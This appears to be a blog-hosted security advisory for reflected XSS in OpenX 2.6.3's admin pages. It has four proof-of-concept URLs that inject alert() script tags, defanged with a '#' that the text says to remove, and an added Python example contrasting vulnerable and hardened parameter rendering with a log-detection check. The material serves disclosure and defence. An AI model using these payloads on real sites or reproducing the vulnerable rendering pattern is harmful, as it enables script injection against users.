OpenX 2.6.3 orderdirection and listorder parameter XSS Exploits
by Vinod Sharma on May.03, 2009, under MyHacks
###############################################################################
OpenX 2.6.3 orderdirection and listorder parameter XSS Vulnerability
Input passed to the “orderdirection” and “listorder” parameters in
“www/admin/userlog-index.php” and “www/admin/stats.php” is not
properly sanitised before being returned to the user. This can be
exploited to execute arbitrary HTML and script code in a user’s
browser session in the context of an affected site.
Vulnerability fixed in 2.6.4
http://www.openx.org/ad-server/download
Published at: http://www.packetstormsecurity.org/0902-exploits/openxorderdir-xss.rar
###############################################################################
exploit1:
filename: www/admin/userlog-index.php
parameter: listorder
POC:
http://172.16.4.113/openx-2.6.3/www/admin/userlog-index.php?listorder=updated';<#script>alert(String.fromCharCode(88,83,83))&orderdirection=down
exploit2:
filename: www/admin/userlog-index.php
parameter: orderdirection
POC:
http://172.16.4.113/openx-2.6.3/www/admin/userlog-index.php?listorder=updated&orderdirection=down';<#script>alert(String.fromCharCode(88,83,83))
exploit3:
filename: www/admin/stats.php
parameter: listorder
POC:
http://172.16.4.113/openx-2.6.3/www/admin/stats.php?statsBreakdown=day&listorder=name';<#script>alert(String.fromCharCode(88,83,83))&orderdirection=up&day=&setPerPage=15&entity=global&breakdown=history&period_preset=all_stats&period_start=&period_end=
exploit4:
filename: www/admin/stats.php
parameter: orderdirection
POC:
http://172.16.4.113/openx-2.6.3/www/admin/stats.php?statsBreakdown=day&listorder=name&orderdirection=up';<#script>alert(String.fromCharCode(88,83,83))&day=&setPerPage=15&entity=global&breakdown=history&period_preset=all_stats&period_start=&period_end=
Note: remove the # character from the opening script tag in all PoCs to reproduce this vulnerability.
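The root cause above is that sort parameters are echoed into the admin page's HTML without validation or output encoding. The following is an added example (not OpenX's own code) showing that reflection pattern beside a hardened version that allowlists both parameters and HTML-encodes them, plus a matching detection check for access-log URLs; the sortable column names and the POC_URL are assumptions constructed for the example.

```python
import html
from urllib.parse import unquote_plus, urlsplit

# Allowlists for the two sort parameters. These column names are assumed for
# this example; the real set of OpenX sortable columns is not given on the page.
ALLOWED_LISTORDER = {"name", "updated", "id"}
ALLOWED_DIRECTION = {"up", "down"}
DEFAULT_LISTORDER, DEFAULT_DIRECTION = "name", "up"


def query_params(url):
    """Split the query string on '&' only, so a ';' inside a value is preserved."""
    params = {}
    for pair in urlsplit(url).query.split("&"):
        key, _, value = pair.partition("=")
        if key:
            params[unquote_plus(key)] = unquote_plus(value)
    return params


def render_sort_link_vulnerable(listorder, orderdirection):
    """The flawed pattern: the parameters are copied into markup untouched."""
    return (f"<a href=\"stats.php?listorder={listorder}"
            f"&orderdirection={orderdirection}\">sort</a>")


def validate_sort_params(listorder, orderdirection):
    """Allowlist both values; anything else falls back to a safe default."""
    if listorder not in ALLOWED_LISTORDER:
        listorder = DEFAULT_LISTORDER
    if orderdirection not in ALLOWED_DIRECTION:
        orderdirection = DEFAULT_DIRECTION
    return listorder, orderdirection


def render_sort_link_hardened(listorder, orderdirection):
    """Allowlist first, then HTML-encode anyway as defence in depth."""
    lo, od = validate_sort_params(listorder, orderdirection)
    return (f'<a href="stats.php?listorder={html.escape(lo, quote=True)}'
            f'&amp;orderdirection={html.escape(od, quote=True)}">sort</a>')


def is_suspicious_sort_request(url):
    """Detection rule for access logs: a sort parameter outside the allowlist."""
    p = query_params(url)
    lo = p.get("listorder", DEFAULT_LISTORDER)
    od = p.get("orderdirection", DEFAULT_DIRECTION)
    return (lo, od) != validate_sort_params(lo, od)


# Constructed request modelled on the advisory's PoC (with the '#' removed).
POC_URL = ("http://127.0.0.1/www/admin/stats.php?statsBreakdown=day"
           "&listorder=name';<script>alert(1)</script>&orderdirection=up")
```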
###############################################################################